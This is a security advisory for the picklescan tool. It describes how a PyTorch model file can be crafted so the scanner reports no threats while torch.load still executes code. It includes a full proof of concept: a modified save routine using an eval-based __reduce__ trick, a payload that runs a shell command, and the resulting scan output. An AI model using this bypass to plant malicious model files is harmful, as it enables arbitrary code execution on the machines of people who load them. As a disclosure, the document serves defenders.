GHSA-97f8-7cmv-76j2
Summary
This is a scanning bypass to scan_pytorch function in picklescan. As we can see in the implementation of getmagicnumber() that uses pickletools.genops(data) to get the magic_number with the condition opcode.name includes INT or LONG, but the PyTorch's implemtation simply uses pickle_module.load() to get this magic_number. For this implementation difference, we then can embed the magic_code into the PyTorch file via dynamic eval on the __reduce__ trick, which can make the pickletools.genops(data) cannot get the magic_code in INT or LONG type, but the pickle_module.load() can still return the same magic_code, eading to a bypass.
PoC
Attack Step 1
we can edit the source code of the function _legacy_save() as follows:
class payload:
def __reduce__(self):
return (eval, ('MAGIC_NUMBER',))
pickle_module.dump(payload(), f, protocol=pickle_protocol)Attack Step 2
with the modified version of PyTorch, we run the following PoC to generate the payload.pt:
import torch
class payload:
def __reduce__(self):
return (__import__('os').system, ('touch /tmp/hacked',))
torch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)Picklescan result
ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
----------- SCAN SUMMARY -----------
Scanned files: 0
Infected files: 0
Dangerous globals: 0Victim Step
import torch
torch.load('./payload.pt', weights_only=False)then you can find the illegal file /tmp/hacked created in your local system.
Impact
Craft malicious PyTorch payloads to bypass picklescan, then recall ACE/RCE.
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version
Related Resources
References
https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2, https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c, https://github.com/mmaitre314/picklescan
Basic Information
